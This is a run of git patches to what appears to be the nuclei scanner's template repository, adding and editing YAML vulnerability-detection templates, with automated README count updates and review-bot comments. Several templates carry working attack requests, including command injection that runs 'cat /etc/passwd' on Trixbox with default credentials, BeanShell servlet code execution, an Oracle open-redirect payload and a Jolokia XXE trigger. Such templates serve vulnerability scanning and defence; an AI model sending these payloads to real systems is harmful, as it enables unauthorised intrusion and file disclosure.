@@ -38,13 +38,13 @@ An overview of the nuclei template directory including number of templates assoc | Templates | Counts | Templates | Counts | Templates | Counts | | ---------------- | ------------------------------ | --------------- | ------------------------------- | -------------- | ---------------------------- | -| cves | 321 | vulnerabilities | 173 | exposed-panels | 142 | +| cves | 321 | vulnerabilities | 174 | exposed-panels | 142 | | takeovers | 67 | exposures | 106 | technologies | 97 | | misconfiguration | 66 | workflows | 31 | miscellaneous | 22 | | default-logins | 30 | exposed-tokens | 0 | dns | 9 | | fuzzing | 9 | helpers | 8 | iot | 12 | -**110 directories, 1181 files**. +**110 directories, 1182 files**. From 0187934d32ae50d2d9e2f3054adcc730b96ab0f4 Mon Sep 17 00:00:00 2001 From: Roberto Nunes <46332131+Akokonunes@users.noreply.github.com> Date: Mon, 31 May 2021 19:51:44 +0900 Subject: [PATCH 053/144] Create oracle-ebusiness-openredirect.yaml --- oracle-ebusiness-openredirect.yaml | 24 ++++++++++++++++++++++++ 1 file changed, 24 insertions(+) create mode 100644 oracle-ebusiness-openredirect.yaml diff --git a/oracle-ebusiness-openredirect.yaml b/oracle-ebusiness-openredirect.yaml new file mode 100644 index 0000000000..682b6496e8 --- /dev/null +++ b/oracle-ebusiness-openredirect.yaml @@ -0,0 +1,24 @@ +id: oracle-ebusiness-openredirect + +info: + name: Oracle E-Business Suite 12.1.3/12.2.x - Open Redirect + author: 0x_Akoko + severity: low + reference: https://www.exploit-db.com/exploits/43592 + tags: Oracle,redirect + +requests: + - method: GET + path: + - "{{BaseURL}}/plus/OA_HTML/cabo/jsps/a.jsp?_t=fredRC&configName=&redirect=/\example.com" + + matchers-condition: and + matchers: + - type: word + words: + - "Location: https://example.com" + part: header + + - type: status + status: + - 302 From 2cc30c771a7c7ad8e825792d234c964c79f87f03 Mon Sep 17 00:00:00 2001 
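Review bot: In the double-quoted oracle-ebusiness-openredirect path, `\e` inside `redirect=/\example.com` is a YAML escape for the ESC character (0x1B), so the request actually sends `redirect=/<ESC>xample.com`; URL-encode the payload instead, `redirect=%2f%5cexample.com`, or use single quotes. The header matcher expects `Location: https://example.com`, but a redirect to `/\example.com` would carry that literal path rather than an absolute https URL, so the two matchers cannot both be satisfied as written. The file also sits at the repository root with a `/plus/` prefix baked into the path, both of which look specific to one target.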
From: sandeep <8293321+ehsandeep@users.noreply.github.com> Date: Mon, 31 May 2021 16:53:36 +0530 Subject: [PATCH 054/144] misc updates --- cves/2017/CVE-2017-3528.yaml | 21 +++++++++++++++++++++ oracle-ebusiness-openredirect.yaml | 24 ------------------------ 2 files changed, 21 insertions(+), 24 deletions(-) create mode 100644 cves/2017/CVE-2017-3528.yaml delete mode 100644 oracle-ebusiness-openredirect.yaml diff --git a/cves/2017/CVE-2017-3528.yaml b/cves/2017/CVE-2017-3528.yaml new file mode 100644 index 0000000000..f37b6660e4 --- /dev/null +++ b/cves/2017/CVE-2017-3528.yaml @@ -0,0 +1,21 @@ +id: CVE-2017-3528 + +info: + name: Oracle E-Business Suite 12.1.3/12.2.x - Open Redirect + author: 0x_Akoko + severity: low + reference: | + - https://blog.zsec.uk/cve-2017-3528/ + - https://www.exploit-db.com/exploits/43592 + tags: oracle,redirect + +requests: + - method: GET + path: + - "{{BaseURL}}/OA_HTML/cabo/jsps/a.jsp?_t=fredRC&configName=&redirect=%2f%5cexample.com" + + matchers: + - type: word + words: + - 'noresize src="/\example.com?configName=' + part: body \ No newline at end of file diff --git a/oracle-ebusiness-openredirect.yaml b/oracle-ebusiness-openredirect.yaml deleted file mode 100644 index 682b6496e8..0000000000 --- a/oracle-ebusiness-openredirect.yaml +++ /dev/null @@ -1,24 +0,0 @@ -id: oracle-ebusiness-openredirect - -info: - name: Oracle E-Business Suite 12.1.3/12.2.x - Open Redirect - author: 0x_Akoko - severity: low - reference: https://www.exploit-db.com/exploits/43592 - tags: Oracle,redirect - -requests: - - method: GET - path: - - "{{BaseURL}}/plus/OA_HTML/cabo/jsps/a.jsp?_t=fredRC&configName=&redirect=/\example.com" - - matchers-condition: and - matchers: - - type: word - words: - - "Location: https://example.com" - part: header - - - type: status - status: - - 302 From 26778216b3dd290f2241b98d7bfae8e1ec58d080 Mon Sep 17 00:00:00 2001 
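Review bot: The CVE-2017-3528 template gives no hint why `%2f%5cexample.com` is used or why a body token is matched instead of a 3xx `Location`, which makes the matcher look arbitrary to the next maintainer. A short `description:` would help, e.g. `description: a.jsp reflects the redirect parameter into a frame src; %2f%5c decodes to "/\", which browsers normalise to the protocol-relative //example.com, so no Location header is involved` (wording per the referenced write-up — confirm against it). The exact token `noresize src="/\example.com?configName=` also pins attribute order and spacing, so it is worth noting in a comment that it was verified against the 12.1.3/12.2.x markup.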
From: GitHub Action Date: Mon, 31 May 2021 11:27:35 +0000 Subject: [PATCH 055/144] Auto Update README [Mon May 31 11:27:35 UTC 2021] :robot: --- README.md | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/README.md b/README.md index 74c5dd9066..719e1bb854 100644 --- a/README.md +++ b/README.md @@ -38,13 +38,13 @@ An overview of the nuclei template directory including number of templates assoc | Templates | Counts | Templates | Counts | Templates | Counts | | ---------------- | ------------------------------ | --------------- | ------------------------------- | -------------- | ---------------------------- | -| cves | 321 | vulnerabilities | 174 | exposed-panels | 142 | +| cves | 322 | vulnerabilities | 174 | exposed-panels | 142 | | takeovers | 67 | exposures | 106 | technologies | 97 | | misconfiguration | 66 | workflows | 31 | miscellaneous | 22 | | default-logins | 30 | exposed-tokens | 0 | dns | 9 | | fuzzing | 9 | helpers | 8 | iot | 12 | -**110 directories, 1182 files**. +**110 directories, 1183 files**. From da2dd11407ff63e9f54604a064bcdc578d2742f0 Mon Sep 17 00:00:00 2001 From: sandeep <8293321+ehsandeep@users.noreply.github.com> Date: Mon, 31 May 2021 17:07:43 +0530 Subject: [PATCH 056/144] moving files around --- .../openerp-database.yaml | 8 ++++---- 1 file changed, 4 insertions(+), 4 deletions(-) rename technologies/openerp-database-instances-detect.yaml => exposed-panels/openerp-database.yaml (81%) diff --git a/technologies/openerp-database-instances-detect.yaml b/exposed-panels/openerp-database.yaml similarity index 81% rename from technologies/openerp-database-instances-detect.yaml rename to exposed-panels/openerp-database.yaml index 38c10b6122..1596be9ca4 100644 --- a/technologies/openerp-database-instances-detect.yaml +++ b/exposed-panels/openerp-database.yaml 
@@ -1,10 +1,10 @@ -id: OpenERP-database-instances +id: openerp-database -info: +info: name: OpenERP database instances author: impramodsargar severity: info - tags: database + tags: openerp requests: - method: GET @@ -19,4 +19,4 @@ requests: - type: status status: - - 200 + - 200 \ No newline at end of file From 8dc17065dc57227558e9554af6b3b54c572605b9 Mon Sep 17 00:00:00 2001 From: sandeep <8293321+ehsandeep@users.noreply.github.com> Date: Mon, 31 May 2021 17:09:45 +0530 Subject: [PATCH 057/144] Update openerp-database.yaml --- exposed-panels/openerp-database.yaml | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) diff --git a/exposed-panels/openerp-database.yaml b/exposed-panels/openerp-database.yaml index 1596be9ca4..c9446f8607 100644 --- a/exposed-panels/openerp-database.yaml +++ b/exposed-panels/openerp-database.yaml @@ -13,10 +13,10 @@ requests: matchers-condition: and matchers: - - type: word - words: + - type: word + words: - 'Odoo' - type: status - status: + status: - 200 \ No newline at end of file From 3dafff50c86c19fcac99d243d7966b7f886f373d Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Mon, 31 May 2021 11:41:36 +0000 Subject: [PATCH 058/144] Auto Update README [Mon May 31 11:41:36 UTC 2021] :robot: --- README.md | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/README.md b/README.md index 719e1bb854..d7207c7b14 100644 --- a/README.md +++ b/README.md 
@@ -38,13 +38,13 @@ An overview of the nuclei template directory including number of templates assoc | Templates | Counts | Templates | Counts | Templates | Counts | | ---------------- | ------------------------------ | --------------- | ------------------------------- | -------------- | ---------------------------- | -| cves | 322 | vulnerabilities | 174 | exposed-panels | 142 | +| cves | 322 | vulnerabilities | 174 | exposed-panels | 143 | | takeovers | 67 | exposures | 106 | technologies | 97 | | misconfiguration | 66 | workflows | 31 | miscellaneous | 22 | | default-logins | 30 | exposed-tokens | 0 | dns | 9 | | fuzzing | 9 | helpers | 8 | iot | 12 | -**110 directories, 1183 files**. +**110 directories, 1184 files**. From 8d3f2e3604ea197ead0fe360e4f9e1bd4f9d2de4 Mon Sep 17 00:00:00 2001 From: sandeep <8293321+ehsandeep@users.noreply.github.com> Date: Mon, 31 May 2021 17:29:52 +0530 Subject: [PATCH 059/144] misc changes --- ...atistics-blindsql.yaml => wp-plugin-statistics-sqli.yaml} | 5 +++-- 1 file changed, 3 insertions(+), 2 deletions(-) rename vulnerabilities/wordpress/{wp-statistics-blindsql.yaml => wp-plugin-statistics-sqli.yaml} (92%) diff --git a/vulnerabilities/wordpress/wp-statistics-blindsql.yaml b/vulnerabilities/wordpress/wp-plugin-statistics-sqli.yaml similarity index 92% rename from vulnerabilities/wordpress/wp-statistics-blindsql.yaml rename to vulnerabilities/wordpress/wp-plugin-statistics-sqli.yaml index 40730242cd..da683968f2 100644 --- a/vulnerabilities/wordpress/wp-statistics-blindsql.yaml +++ b/vulnerabilities/wordpress/wp-plugin-statistics-sqli.yaml @@ -1,4 +1,5 @@ -id: WP-Statistics-BlindSQL +id: wp-plugin-statistics-sqli + info: name: WordPress Plugin WP Statistics 13.0-.7 - Unauthenticated Time-Based Blind SQL Injection author: lotusdll 
@@ -8,7 +9,7 @@ info: - https://www.exploit-db.com/exploits/49894 - https://www.wordfence.com/blog/2021/05/over-600000-sites-impacted-by-wp-statistics-patch/ - https://github.com/Udyz/WP-Statistics-BlindSQL - tags: unauth,blindsql,wordpress + tags: wordpress,wp-plugin,unauth,sqli,blind requests: - method: GET From 633644b159743e2bcde536cf6993edb95e5d818a Mon Sep 17 00:00:00 2001 From: sandeep <8293321+ehsandeep@users.noreply.github.com> Date: Mon, 31 May 2021 19:20:59 +0530 Subject: [PATCH 060/144] Added CVE-2021-21985 --- cves/2021/CVE-2021-21985.yaml | 31 +++++++++++++++++++++++++++++++ 1 file changed, 31 insertions(+) create mode 100644 cves/2021/CVE-2021-21985.yaml diff --git a/cves/2021/CVE-2021-21985.yaml b/cves/2021/CVE-2021-21985.yaml new file mode 100644 index 0000000000..97118e8ec5 --- /dev/null +++ b/cves/2021/CVE-2021-21985.yaml 
@@ -0,0 +1,31 @@ +id: CVE-2021-21985 + +info: + name: VMware vSphere Client (HTML5) RCE + author: D0rkerDevil + severity: critical + description: | + The vSphere Client (HTML5) contains a remote code execution vulnerability due to lack of input validation in the Virtual SAN Health Check plug-in which is enabled by default in vCenter Server. A malicious actor with network access to port 443 may exploit this issue to execute commands with unrestricted privileges on the underlying operating system that hosts vCenter Server. + reference: | + - https://nvd.nist.gov/vuln/detail/CVE-2021-21985 + - https://www.vmware.com/security/advisories/VMSA-2021-0010.html + - https://github.com/alt3kx/CVE-2021-21985_PoC + tags: cve,cve201,rce,vsphere + +requests: + - raw: + - | + POST /ui/h5-vsan/rest/proxy/service/com.vmware.vsan.client.services.capability.VsanCapabilityProvider/getClusterCapabilityData HTTP/1.1 + Host: {{Hostname}} + Accept: */* + Content-Type: application/json + Content-Length: 86 + Connection: close + + {"methodInput":[{"type":"ClusterComputeResource","value": null,"serverGuid": null}]} + + matchers: + - type: word + words: + - '{"result":{"isDisconnected":' + part: body From 5dd09fe02dd4e277ed77ef21688b73df503965d4 Mon Sep 17 00:00:00 2001 From: fanpan Date: Mon, 31 May 2021 19:28:31 +0530 Subject: [PATCH 061/144] spring 2x path --- .../springboot-actuators-jolokia-xxe-v2.yaml | 31 +++++++++++++++++++ 1 file changed, 31 insertions(+) create mode 100644 vulnerabilities/springboot/springboot-actuators-jolokia-xxe-v2.yaml diff --git a/vulnerabilities/springboot/springboot-actuators-jolokia-xxe-v2.yaml b/vulnerabilities/springboot/springboot-actuators-jolokia-xxe-v2.yaml new file mode 100644 index 0000000000..e9543515ca --- /dev/null +++ b/vulnerabilities/springboot/springboot-actuators-jolokia-xxe-v2.yaml 
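Review bot: The only matcher is the body fragment `{"result":{"isDisconnected":`, so a hit means the vSAN Health proxy endpoint answered an unauthenticated `getClusterCapabilityData` call, not that code executed; say so in the description (`# detection only: confirms the unauthenticated vSAN Health proxy responds, per the referenced PoC`) so findings are triaged correctly. Add a `type: status` 200 matcher under `matchers-condition: and` to pin the success path. `cve201` in `tags:` is a typo for `cve2021`, and `Content-Length: 86` does not appear to match the 84-byte JSON body (harmless in nuclei's default mode, which recomputes it, but misleading for manual replay).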
@@ -0,0 +1,31 @@ +id: springboot-actuators-jolokia-xxe-v2 + +info: + name: Spring Boot Actuators (Jolokia) XXE + author: ipanda + severity: high + description: A vulnerability in Spring Boot Actuators's 'jolokia' endpoint allows remote attackers to preform an XML External Entities attack, include content stored on a remote server as if it was its own - this has the potential to allow the execution of arbitrary code and/or disclosure of sensitive information from the target machine. + reference: | + - https://www.veracode.com/blog/research/exploiting-spring-boot-actuators + tags: springboot,jolokia,xxe + +requests: + - method: GET + path: + - "{{BaseURL}}/actuator/jolokia/exec/ch.qos.logback.classic:Name=default,Type=ch.qos.logback.classic.jmx.JMXConfigurator/reloadByURL/http:!/!/random:915!/logback.xml" + matchers-condition: and + matchers: + - type: status + status: + - 200 + - type: word + words: + - "http:\\/\\/random:915\\/logback.xml" + - "reloadByURL" + - "JoranException" + condition: and + part: body + - type: word + words: + - "X-Application-Context" + part: header From 19b73df6be4c5c6bf9f9406f15742870e831990e Mon Sep 17 00:00:00 2001 From: sandeep <8293321+ehsandeep@users.noreply.github.com> Date: Mon, 31 May 2021 19:44:44 +0530 Subject: [PATCH 062/144] Update CVE-2021-21985.yaml --- cves/2021/CVE-2021-21985.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/cves/2021/CVE-2021-21985.yaml b/cves/2021/CVE-2021-21985.yaml index 97118e8ec5..5271910e78 100644 --- a/cves/2021/CVE-2021-21985.yaml +++ b/cves/2021/CVE-2021-21985.yaml @@ -10,7 +10,7 @@ info: - https://nvd.nist.gov/vuln/detail/CVE-2021-21985 - https://www.vmware.com/security/advisories/VMSA-2021-0010.html - https://github.com/alt3kx/CVE-2021-21985_PoC - tags: cve,cve201,rce,vsphere + tags: cve,cve2021,rce,vsphere requests: - raw: From 0095b6841276a17b58888b3867f1cbdfca5a97f0 Mon Sep 17 00:00:00 2001 
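Review bot: This new file duplicates `springboot-actuators-jolokia-xxe.yaml` apart from the `/actuator/` prefix and the marker host, so a second `path:` entry in the existing template is cheaper than a parallel template with its own id to maintain. More importantly, the commit targets the Spring Boot 2.x endpoint layout but still requires the `X-Application-Context` response header under `matchers-condition: and`; as far as I recall Boot 2 stopped sending that header by default, so the template would never fire on exactly the hosts it was written for — drop that header matcher or make the condition tolerate its absence. Keeping the marker host identical to the existing template's (`nonexistent:31337`) would also let one body matcher serve both paths.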
From: GitHub Action Date: Mon, 31 May 2021 14:22:37 +0000 Subject: [PATCH 063/144] Auto Update README [Mon May 31 14:22:36 UTC 2021] :robot: --- README.md | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/README.md b/README.md index d7207c7b14..2b769f3645 100644 --- a/README.md +++ b/README.md @@ -38,13 +38,13 @@ An overview of the nuclei template directory including number of templates assoc | Templates | Counts | Templates | Counts | Templates | Counts | | ---------------- | ------------------------------ | --------------- | ------------------------------- | -------------- | ---------------------------- | -| cves | 322 | vulnerabilities | 174 | exposed-panels | 143 | +| cves | 323 | vulnerabilities | 174 | exposed-panels | 143 | | takeovers | 67 | exposures | 106 | technologies | 97 | | misconfiguration | 66 | workflows | 31 | miscellaneous | 22 | | default-logins | 30 | exposed-tokens | 0 | dns | 9 | | fuzzing | 9 | helpers | 8 | iot | 12 | -**110 directories, 1184 files**. +**110 directories, 1185 files**. From bad1f52fd29218c1423b353a145ba80cb9fffbea Mon Sep 17 00:00:00 2001 From: sandeep <8293321+ehsandeep@users.noreply.github.com> Date: Mon, 31 May 2021 20:05:39 +0530 Subject: [PATCH 064/144] Added additional path --- .../springboot-actuators-jolokia-xxe-v2.yaml | 31 ------------------- .../springboot-actuators-jolokia-xxe.yaml | 4 ++- 2 files changed, 3 insertions(+), 32 deletions(-) delete mode 100644 vulnerabilities/springboot/springboot-actuators-jolokia-xxe-v2.yaml diff --git a/vulnerabilities/springboot/springboot-actuators-jolokia-xxe-v2.yaml b/vulnerabilities/springboot/springboot-actuators-jolokia-xxe-v2.yaml deleted file mode 100644 index e9543515ca..0000000000 --- a/vulnerabilities/springboot/springboot-actuators-jolokia-xxe-v2.yaml +++ /dev/null 
@@ -1,31 +0,0 @@ -id: springboot-actuators-jolokia-xxe-v2 - -info: - name: Spring Boot Actuators (Jolokia) XXE - author: ipanda - severity: high - description: A vulnerability in Spring Boot Actuators's 'jolokia' endpoint allows remote attackers to preform an XML External Entities attack, include content stored on a remote server as if it was its own - this has the potential to allow the execution of arbitrary code and/or disclosure of sensitive information from the target machine. - reference: | - - https://www.veracode.com/blog/research/exploiting-spring-boot-actuators - tags: springboot,jolokia,xxe - -requests: - - method: GET - path: - - "{{BaseURL}}/actuator/jolokia/exec/ch.qos.logback.classic:Name=default,Type=ch.qos.logback.classic.jmx.JMXConfigurator/reloadByURL/http:!/!/random:915!/logback.xml" - matchers-condition: and - matchers: - - type: status - status: - - 200 - - type: word - words: - - "http:\\/\\/random:915\\/logback.xml" - - "reloadByURL" - - "JoranException" - condition: and - part: body - - type: word - words: - - "X-Application-Context" - part: header diff --git a/vulnerabilities/springboot/springboot-actuators-jolokia-xxe.yaml b/vulnerabilities/springboot/springboot-actuators-jolokia-xxe.yaml index d6b61f02fa..c328de1e7d 100644 --- a/vulnerabilities/springboot/springboot-actuators-jolokia-xxe.yaml +++ b/vulnerabilities/springboot/springboot-actuators-jolokia-xxe.yaml @@ -2,7 +2,7 @@ id: springboot-actuators-jolokia-xxe info: name: Spring Boot Actuators (Jolokia) XXE - author: dwisiswant0 + author: dwisiswant0 & ipanda severity: high description: A vulnerability in Spring Boot Actuators's 'jolokia' endpoint allows remote attackers to preform an XML External Entities attack, include content stored on a remote server as if it was its own - this has the potential to allow the execution of arbitrary code and/or disclosure of sensitive information from the target machine. reference: | 
@@ -14,6 +14,8 @@ requests: - method: GET path: - "{{BaseURL}}/jolokia/exec/ch.qos.logback.classic:Name=default,Type=ch.qos.logback.classic.jmx.JMXConfigurator/reloadByURL/http:!/!/nonexistent:31337!/logback.xml" + - "{{BaseURL}}/actuator/jolokia/exec/ch.qos.logback.classic:Name=default,Type=ch.qos.logback.classic.jmx.JMXConfigurator/reloadByURL/http:!/!/random:915!/logback.xml" + matchers-condition: and matchers: - type: status From fe1ab8385d25a871973e03952afb2f9584970868 Mon Sep 17 00:00:00 2001 From: Geeknik Labs <466878+geeknik@users.noreply.github.com> Date: Mon, 31 May 2021 11:31:04 -0500 Subject: [PATCH 065/144] Update and rename exposures/logs/circarlife-system-log.yaml to cves/2018/CVE-2018-12634.yaml --- .../2018/CVE-2018-12634.yaml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) rename exposures/logs/circarlife-system-log.yaml => cves/2018/CVE-2018-12634.yaml (88%) diff --git a/exposures/logs/circarlife-system-log.yaml b/cves/2018/CVE-2018-12634.yaml similarity index 88% rename from exposures/logs/circarlife-system-log.yaml rename to cves/2018/CVE-2018-12634.yaml index 5567438fa5..ac652812c9 100644 --- a/exposures/logs/circarlife-system-log.yaml +++ b/cves/2018/CVE-2018-12634.yaml @@ -1,4 +1,4 @@ -id: circarlife-system-log +id: CVE-2018-12634 info: name: Exposed CirCarLife System Log @@ -6,7 +6,7 @@ info: description: CirCarLife is an internet-connected electric vehicle charging station reference: https://circontrol.com/ severity: medium - tags: scada,circontrol,circarlife,logs + tags: cve,cve2018,scada,circontrol,circarlife,logs requests: - method: GET From 53fc8f8c888b3372561365e8d3a28b27c53329e0 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Tue, 1 Jun 2021 05:28:14 +0000 Subject: [PATCH 066/144] Auto Update README [Tue Jun 1 05:28:14 UTC 2021] :robot: --- README.md | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/README.md b/README.md index 2b769f3645..bd8c4bbe5b 100644 --- a/README.md +++ b/README.md 
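Review bot: The added path points the reload at `random:915` while the existing one uses `nonexistent:31337`; the body word matcher of this template sits outside the hunk, and if it pins the `nonexistent:31337` host string the response to the new path can never match. Either reuse the same host in both entries, e.g. `- "{{BaseURL}}/actuator/jolokia/exec/ch.qos.logback.classic:Name=default,Type=ch.qos.logback.classic.jmx.JMXConfigurator/reloadByURL/http:!/!/nonexistent:31337!/logback.xml"`, or make the matcher accept both strings. The empty `+` line inserted before `matchers-condition: and` is stray whitespace.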
@@ -38,8 +38,8 @@ An overview of the nuclei template directory including number of templates assoc | Templates | Counts | Templates | Counts | Templates | Counts | | ---------------- | ------------------------------ | --------------- | ------------------------------- | -------------- | ---------------------------- | -| cves | 323 | vulnerabilities | 174 | exposed-panels | 143 | -| takeovers | 67 | exposures | 106 | technologies | 97 | +| cves | 324 | vulnerabilities | 174 | exposed-panels | 143 | +| takeovers | 67 | exposures | 105 | technologies | 97 | | misconfiguration | 66 | workflows | 31 | miscellaneous | 22 | | default-logins | 30 | exposed-tokens | 0 | dns | 9 | | fuzzing | 9 | helpers | 8 | iot | 12 | From b021a0cf49b20fd0f56ec71791809feaf415ef4d Mon Sep 17 00:00:00 2001 From: sandeep <8293321+ehsandeep@users.noreply.github.com> Date: Tue, 1 Jun 2021 11:06:13 +0530 Subject: [PATCH 067/144] Misc changes --- cves/2017/CVE-2017-14535.yaml | 14 +++++++------- 1 file changed, 7 insertions(+), 7 deletions(-) diff --git a/cves/2017/CVE-2017-14535.yaml b/cves/2017/CVE-2017-14535.yaml index 1d890e7405..f72453f16f 100644 --- a/cves/2017/CVE-2017-14535.yaml +++ b/cves/2017/CVE-2017-14535.yaml 
@@ -1,24 +1,24 @@ id: CVE-2017-14535 info: - name: Trixbox 2.8.0.4 Remote Code Execution + name: Trixbox - 2.8.0.4 OS Command Injection Vulnerability author: pikpikcu severity: high - reference: https://www.exploit-db.com/exploits/49913 - tags: trixbox,rce + reference: | + - https://secur1tyadvisory.wordpress.com/2018/02/11/trixbox-os-command-injection-vulnerability-cve-2017-14535/ + - https://www.exploit-db.com/exploits/49913 + tags: cve,cve2017,trixbox,rce requests: - raw: - | - POST /maint/modules/home/index.php?lang=english|cat%20/etc/passwd HTTP/1.1 + GET /maint/modules/home/index.php?lang=english|cat%20/etc/passwd HTTP/1.1 Host: {{Hostname}} - User-Agent: User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:88.0) Gecko/20100101 Firefox/88.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: de,en-US;q=0.7,en;q=0.3 Authorization: Basic bWFpbnQ6cGFzc3dvcmQ= Connection: close - Upgrade-Insecure-Requests: 1 - Cache-Control: max-age=0 + Cache-Control: max-age=0 matchers-condition: and matchers: From f41ec6bb6890da6828f9d7a52163c549c3c6a9a7 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Tue, 1 Jun 2021 05:38:14 +0000 Subject: [PATCH 068/144] Auto Update README [Tue Jun 1 05:38:14 UTC 2021] :robot: --- README.md | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/README.md b/README.md index bd8c4bbe5b..e643970b21 100644 --- a/README.md +++ b/README.md 
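Review bot: The raw request still carries `Authorization: Basic bWFpbnQ6cGFzc3dvcmQ=`, which is the default `maint:password` credential, and the info block never says so; a target whose credentials were changed answers with an auth error and reads as not vulnerable, which is worth knowing when triaging negatives. Add a line such as `description: Trixbox 2.8.0.4 is vulnerable to OS command injection through the lang parameter of /maint/modules/home/index.php; the request authenticates with the default maint:password HTTP Basic credentials.`. The switch from POST to GET and the removal of the doubled `User-Agent: User-Agent:` prefix are correct; the matchers follow outside the hunk.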
@@ -38,13 +38,13 @@ An overview of the nuclei template directory including number of templates assoc | Templates | Counts | Templates | Counts | Templates | Counts | | ---------------- | ------------------------------ | --------------- | ------------------------------- | -------------- | ---------------------------- | -| cves | 324 | vulnerabilities | 174 | exposed-panels | 143 | +| cves | 325 | vulnerabilities | 174 | exposed-panels | 143 | | takeovers | 67 | exposures | 105 | technologies | 97 | | misconfiguration | 66 | workflows | 31 | miscellaneous | 22 | | default-logins | 30 | exposed-tokens | 0 | dns | 9 | | fuzzing | 9 | helpers | 8 | iot | 12 | -**110 directories, 1185 files**. +**110 directories, 1186 files**. From 21286365c8efab0dc8ff57a675cf18341611e2a0 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Tue, 1 Jun 2021 06:07:00 +0000 Subject: [PATCH 069/144] Auto Update README [Tue Jun 1 06:07:00 UTC 2021] :robot: --- README.md | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/README.md b/README.md index e643970b21..3462c2d10f 100644 --- a/README.md +++ b/README.md @@ -38,13 +38,13 @@ An overview of the nuclei template directory including number of templates assoc | Templates | Counts | Templates | Counts | Templates | Counts | | ---------------- | ------------------------------ | --------------- | ------------------------------- | -------------- | ---------------------------- | -| cves | 325 | vulnerabilities | 174 | exposed-panels | 143 | +| cves | 325 | vulnerabilities | 175 | exposed-panels | 143 | | takeovers | 67 | exposures | 105 | technologies | 97 | | misconfiguration | 66 | workflows | 31 | miscellaneous | 22 | | default-logins | 30 | exposed-tokens | 0 | dns | 9 | | fuzzing | 9 | helpers | 8 | iot | 12 | -**110 directories, 1186 files**. +**110 directories, 1187 files**. From 0b85f59a6289032f82d322f546b78b06746d994d Mon Sep 17 00:00:00 2001 
From: sandeep <8293321+ehsandeep@users.noreply.github.com> Date: Tue, 1 Jun 2021 13:05:11 +0530 Subject: [PATCH 070/144] Adding max-size limit to avoid timeout --- exposures/backups/zip-backup-files.yaml | 4 ++++ 1 file changed, 4 insertions(+) diff --git a/exposures/backups/zip-backup-files.yaml b/exposures/backups/zip-backup-files.yaml index 3a768423d0..6feee72a8e 100644 --- a/exposures/backups/zip-backup-files.yaml +++ b/exposures/backups/zip-backup-files.yaml @@ -32,6 +32,8 @@ requests: - "{{BaseURL}}/{{Hostname}}.sql.zip" - "{{BaseURL}}/{{Hostname}}.sql.z" - "{{BaseURL}}/{{Hostname}}.sql.tar.z" + + max-size: 500 # Size in bytes - Max Size to read from server response matchers-condition: and matchers: - type: binary @@ -49,10 +51,12 @@ requests: - "504B0304" # zip condition: or part: body + - type: regex regex: - "application/[-\\w.]+" part: header + - type: status status: - 200 From 91941dc8edafe16ead11507324d3d47ab35f1456 Mon Sep 17 00:00:00 2001 From: sandeep <8293321+ehsandeep@users.noreply.github.com> Date: Tue, 1 Jun 2021 13:21:24 +0530 Subject: [PATCH 071/144] Adding max-size to avoid timeout --- exposures/backups/sql-dump.yaml | 3 +++ 1 file changed, 3 insertions(+) diff --git a/exposures/backups/sql-dump.yaml b/exposures/backups/sql-dump.yaml index d6a967bb24..ed7bb21c67 100644 --- a/exposures/backups/sql-dump.yaml +++ b/exposures/backups/sql-dump.yaml @@ -30,12 +30,15 @@ requests: - "{{BaseURL}}/wp-content/uploads/dump.sql" headers: Range: "bytes=0-3000" + + max-size: 2000 # Size in bytes - Max Size to read from server response matchers-condition: and matchers: - type: regex regex: - "(?m)(?:DROP|CREATE|(?:UN)?LOCK) TABLE|INSERT INTO" part: body + - type: status status: - 200 From 39003369f2faba7a542a133b41e3720dbdee0163 Mon Sep 17 00:00:00 2001 
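Review bot: In sql-dump.yaml the new `max-size: 2000` sits under a request that already sends `Range: "bytes=0-3000"`, so the two limits disagree and only the first 2000 bytes are ever matched; a SQL dump usually opens with a comment banner, so the first `CREATE TABLE` or `INSERT INTO` may well fall past that point and the regex matcher then misses it. Align the two values, e.g. `Range: "bytes=0-2000"` or `max-size: 3000`, and extend the comment to say which one is the effective cap. The 500-byte cap added to zip-backup-files.yaml in the same commit is fine, since its binary matcher only inspects the leading magic bytes.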
From: PikPikcU <60111811+pikpikcu@users.noreply.github.com> Date: Tue, 1 Jun 2021 08:28:04 +0000 Subject: [PATCH 072/144] Create nc-bsh-servlet-rce.yaml --- vulnerabilities/other/nc-bsh-servlet-rce.yaml | 40 +++++++++++++++++++ 1 file changed, 40 insertions(+) create mode 100644 vulnerabilities/other/nc-bsh-servlet-rce.yaml diff --git a/vulnerabilities/other/nc-bsh-servlet-rce.yaml b/vulnerabilities/other/nc-bsh-servlet-rce.yaml new file mode 100644 index 0000000000..0aa2f0ee04 --- /dev/null +++ b/vulnerabilities/other/nc-bsh-servlet-rce.yaml @@ -0,0 +1,40 @@ +id: nc-bsh-servlet-rce + +info: + name: NC bsh.servlet.BshServlet RCE + author: pikpikcu + severity: high + reference: https://mp.weixin.qq.com/s/FvqC1I_G14AEQNztU0zn8A + tags: beanshell,rce + +requests: + - raw: + - | #linux + POST /servlet/~ic/bsh.servlet.BshServlet HTTP/1.1 + Host: {{Hostname}} + User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:55.0) Gecko/20100101 Firefox/55.0 + Content-Type: application/x-www-form-urlencoded + + bsh.script=exec("cat /etc/passwd"); + + - | #windows + POST /servlet/~ic/bsh.servlet.BshServlet HTTP/1.1 + Host: {{Hostname}} + User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:55.0) Gecko/20100101 Firefox/55.0 + Content-Type: application/x-www-form-urlencoded + + bsh.script=exec("ipconfig"); + + + matchers-condition: and + matchers: + + - type: regex + regex: + - "root:[x*]:0:0" + - "Windows IP" + + - type: status + status: + - 200 + From 